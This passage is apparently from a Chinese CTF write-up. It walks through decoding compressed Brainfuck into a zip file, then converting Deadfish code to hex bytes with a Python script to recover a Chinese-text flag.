++++<]>+++++++++++++++++.<++++++++++[->----------<]>-.<8+[->8-<]>----------.<7+[->7+<]>++++++++++++++.<5+[->5-<]>8-.<+++++++++++++[->+++++++++++++<]>+++++++++++++++++++++.<++++++++++++++[->--------------<]>6-.<+++++++++++++++[->+++++++++++++++<]>5+.<++++++++++[->----------<]>-----------.3-.<++++++++++[->----------<]>2-.<9+[->9+<]>+++++++++++++++++.<++++++++++[->----------<]>--------------------.<6+[->6+<]>8+.<++++++++++++[->++++++++++++<]>+.<++++++++++++[->------------<]>---------------------.<6+[->6+<]>3+.<8+[->8+<]>+++++++++++++.<4+[->4+<]>3+.<8+[->8-<]>7-.<+++++++++++[->+++++++++++<]>++++++++++.<++++++++++++[->------------<]>----------.<+++++++++++[->+++++++++++<]>8+.<8+[->8-<]>----------.<3+[->3-<]>4-.<++++++++++[->----------<]>-------------------.<++++++++++++[->++
++++++++++<]>+++++++++++++.<++++++++++++[->------------<]>-------------.<4+[->4+<]>5+.<4+[->4+<]>6+.<8+[->8+<]>5+.<7+[->7-<]>9-.<7+[->7-<]>.<+++++++++++[->+++++++++++<]>++++++++++++++++++.<4+[->4-<]>7-.<8+[->8+<]>+++++++++++++++.<++++++++++[->----------<]>.<8+[->8-<]>----------.<9+[->9+<]>6+.<++++++++++[->----------<]>----------------.<++++++++++++[->++++++++++++<]>4+.<3+[->3+<]>3+.<+++++++++++[->-----------<]>--------------.<9+[->9+<]>7+.<3+[->3-<]>5-.<++++++++++[->++++++++++<]>+++++++++++++++++++.<5+[->5+<]>+.6+.<+++++++++++++++[->---------------<]>-----------.<9+[->9+<]>9+.<++++++++++[->++++++++++<]>+++++++++++++.<+++++++++++++[->-------------<]>3-.<8+[->8+<]>.<4+[->4-<]>3-.<5+[->5+<]>9+.<8+[->8+<]>2+.<++++++++++[->----------<]>----------.<6+[->6+<]>9+.<4+[->4-<]>2-.<8+[->8-<]>------------.<5+[->5-<]>6-.<8+[->8+<]>+++++++++++++++.5-.<8+[->8-<]>----------.+.<7+[->7+<]>++++++++++++.<7+[->7-<]>--------------.<4+[->4+<]>4+.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<++++++++++[->++++++++++<]>7+.<++++++++++[->----------<]>3-.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<+++++++++++[->-----------<]>----------------.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-.<6+[->6+<]>.<6+[->6-<]>7.<5+[->5+<]>7+.<5+[->5-<]>7-7.<++++++++++[->++++++++++<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<++++++++++[->----------<]>6-.<3+[->3-<]>-.<5+[->5+<]>7+.<5+[->5-<]>7-5.+.-.<4+[->4+<]>8+.<4+[->4-<]>8-.<+++++++++++[->+++++++++++<]>+++++++++++++++.<7+[->7+<]>7+.<4+[->4+<]>8+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>9-.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<+++++++
+++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>9-.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<8+[->8+<]>+++++++++++++++.5-.<8+[->8-<]>6-.+.6-4.+.-.+.-.<9+[->9+<]>+++++++++++.<9+[->9-<]>-----------3.<+++++++++++[->+++++++++++<]>7+.<+++++++++++[->-----------<]>7-5.<'
# reg = re.compile(r'\d[+-]')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(len(res))
# print(len(rr))
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][0])*res[i][1],end='')
# print(rr[-1])
#
# bf = '++++++++[->++++++++<]>++++++++++++++++.-----.<++++++++[->--------<]>--------.+.<++++[->++++<]>.<++++[->----<]>----3.++++++++.--------.<+++++++++[->+++++++++<]>+++.------.<++++++++++[->++++++++++<]>+++++++.<++++++++++[->----------<]>---.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<+++++++++[->---------<]>--.<+++++++[->+++++++<]>++++++++.+++++.<+++++++++++[->-----------<]>----------------.<+++++++++[->---------<]>-------3.<+++++++[->+++++++<]>+++++++++.<+++++++[->-------<]>-----.----2.<+++[->+++<]>+.<+++[->---<]>-3.<++++++++++[->++++++++++<]>.++.-------.<++++[->++++<]>.++++++.-.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++.++++.----.<++++++++++[->++++++++++<]>+++++.<+++++++++++[->-----------<]>-----------------.<+++++[->-----<]>---------.<+++++[->-----<]>----------.<+++[->---<]>-----.<+++++[->+++++<]>++++++++.<+++++[->-----<]>.<+++++++++++++++[->+++++++++++++++<]>++++++++++++++++++.<+++++++[->-------<]>.<+++++++++++[->-----------<]>--------------------.<++++++++++++[->++++++++++++<]>+++++++++++++++++++.<++++++++[->--------<]>--.<++++++++[->++++++++<]>+++++++.<+++++[->-----<]>----------.<++++++[->++++++<]>++++++.<++++[->++++<]>+++.<+++++++++++++++[->---------------<]>-----------.++++++++.<++++++++++[->++++++++++<]>++++++++++++.<+++++++++++[->-----------<]>--.+++.<++++++++[->++++++++<]>++++++++++.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++++++++++[->-------------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<+++++++++++[->-----------<]>----------.<+++[->+++<]>+++++.<++++++++++[->++++++++++<]>+++++++++++++++++.<++++++++++[->----------<]>-.<++++++++[->--------<]>----------.<+++++++[->+++++++<]>++++++++++++++.<+++++[->-----<]>--------.<+++++++++++++[->+++++++++++++<]>+++++++++++++++++++++.<++++++++++++++[->--------------<]>------.<+++++++++++++++[->+++++++++++++++<]>+++++.<++++++++++[->----------<]>-----------.---.<++++++++++[->----------<]>--.<+++++++++[->+++++++++<]>+++++++++++++++++.<++++++++++[->----------<]
>--------------------.<++++++[->++++++<]>++++++++.<++++++++++++[->++++++++++++<]>+.<++++++++++++[->------------<]>---------------------.<++++++[->++++++<]>+++.<++++++++[->++++++++<]>+++++++++++++.<++++[->++++<]>+++.<++++++++[->--------<]>-------.<+++++++++++[->+++++++++++<]>++++++++++.<++++++++++++[->------------<]>----------.<+++++++++++[->+++++++++++<]>++++++++.<++++++++[->--------<]>----------.<+++[->---<]>----.<++++++++++[->----------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<++++++++++++[->------------<]>-------------.<++++[->++++<]>+++++.<++++[->++++<]>++++++.<++++++++[->++++++++<]>+++++.<+++++++[->-------<]>---------.<+++++++[->-------<]>.<+++++++++++[->+++++++++++<]>++++++++++++++++++.<++++[->----<]>-------.<++++++++[->++++++++<]>+++++++++++++++.<++++++++++[->----------<]>.<++++++++[->--------<]>----------.<+++++++++[->+++++++++<]>++++++.<++++++++++[->----------<]>----------------.<++++++++++++[->++++++++++++<]>++++.<+++[->+++<]>+++.<+++++++++++[->-----------<]>--------------.<+++++++++[->+++++++++<]>+++++++.<+++[->---<]>-----.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++[->+++++<]>+.++++++.<+++++++++++++++[->---------------<]>-----------.<+++++++++[->+++++++++<]>+++++++++.<++++++++++[->++++++++++<]>+++++++++++++.<+++++++++++++[->-------------<]>---.<++++++++[->++++++++<]>.<++++[->----<]>---.<+++++[->+++++<]>+++++++++.<++++++++[->++++++++<]>++.<++++++++++[->----------<]>----------.<++++++[->++++++<]>+++++++++.<++++[->----<]>--.<++++++++[->--------<]>------------.<+++++[->-----<]>------.<++++++++[->++++++++<]>+++++++++++++++.-----.<++++++++[->--------<]>----------.+.<+++++++[->+++++++<]>++++++++++++.<+++++++[->-------<]>--------------.<++++[->++++<]>++++.<++++[->----<]>----3.++++++++.--------.<+++++++++[->+++++++++<]>+++.------.<++++++++++[->++++++++++<]>+++++++.<++++++++++[->----------<]>---.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<+++++++++[->---------<]>--.<+++++++[->+++++++<]>++++++++.+++++.<+++++++++++[->----
-------<]>----------------.<+++++++++[->---------<]>-------3.<+++++++[->+++++++<]>+++++++++.<+++++++[->-------<]>-----.----2.<+++[->+++<]>+.<+++[->---<]>-.<++++++[->++++++<]>.<++++++[->------<]>7.<+++++[->+++++<]>+++++++.<+++++[->-----<]>-------7.<++++++++++[->++++++++++<]>.++.-------.<++++[->++++<]>.++++++.-.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++.++++.----.<++++++++++[->----------<]>------.<+++[->---<]>-.<+++++[->+++++<]>+++++++.<+++++[->-----<]>-------5.+.-.<++++[->++++<]>++++++++.<++++[->----<]>--------.<+++++++++++[->+++++++++++<]>+++++++++++++++.<+++++++[->+++++++<]>+++++++.<++++[->++++<]>++++++++.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>---------.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>---------.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++[->++++++++<]>+++++++++++++++.-----.<++++++++[->--------<]>------.+.------4.+.-.+.-.<+++++++++[->+++++++++<]>+++++++++++.<+++++++++[->---------<]>-----------3.<+++++++++++[->+++++++++++<]>+++++++.<+++++++++++[->-----------<]>-------5.<'
# reg = re.compile(r'\d\.')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(res)
# print(rr)
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][0])*res[i][1],end='')
# print(rr[-1])

然后很坑的地方来了,试了很多python上的brainfuck解码发现解出来的压缩包都有问题,是坏的,最后tokeii师傅找到了可以把brainfuck解码成hex的网站https://gkucmierz.github.io/brainfuck-interpreter/,拿到最后一个zip
图片

解压后发现是isd三个字符组成的编码,一Google就查到了,是deadfish编码,写个脚本转换下

图片

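def deadfish_value(program):
    """Evaluate one Deadfish token and return the accumulator it ends on.

    Only the three commands that occur in this challenge are accepted:
    ``i`` (increment), ``d`` (decrement) and ``s`` (square).  The accumulator
    starts at 0 and, as in the Deadfish language, is reset to 0 whenever it
    becomes exactly 256 or -1.

    Evaluating the token directly replaces the hand-typed 1..255 lookup
    table, so any well-formed token decodes, not only the spellings that
    happened to be listed.

    Raises:
        ValueError: if *program* contains any other character.  The tokens
            come from a file extracted from the challenge archive, so they
            are validated instead of being silently skipped.
    """
    acc = 0
    for op in program:
        if op == 'i':
            acc += 1
        elif op == 'd':
            acc -= 1
        elif op == 's':
            acc *= acc
        else:
            raise ValueError('unexpected Deadfish command: %r' % op)
        # Deadfish quirk: the accumulator wraps to 0 at exactly 256 and -1.
        if acc == 256 or acc == -1:
            acc = 0
    return acc


# Comma-separated Deadfish tokens recovered from the final archive; each token
# encodes one byte value.
s = 'iiisisiiiiiiiiii, iiisisi, iiisiisdd, iiisiisdddddd, iiisisd, iiisiisddddd, iiisisii, iiisiisii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iiisiisiiii'.split(', ')
print(s)
# The first 8 tokens and the last one are plain ASCII (the "newsctf{" prefix
# and the closing "}"); only the bytes in between are dumped as hex.
for token in s[8:-1]:
    # Zero-padded to two digits so a value below 0x10 still occupies a full
    # byte when the dump is pasted into a hex editor.
    print(format(deadfish_value(token), '02x'), end=' ')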

拿到一串hex

bc a6 b0 fc b0 fc bc a6 b0 fc b0 fc bc a6 b0 fc d6 bd b0 fc d6 bd b0 fc bc a6 b0 fc b0 fc bc a6 d6 bd b0 fc bc a6 b0 fc d6 bd b0 fc bc a6

放到winhex得到中文flag
图片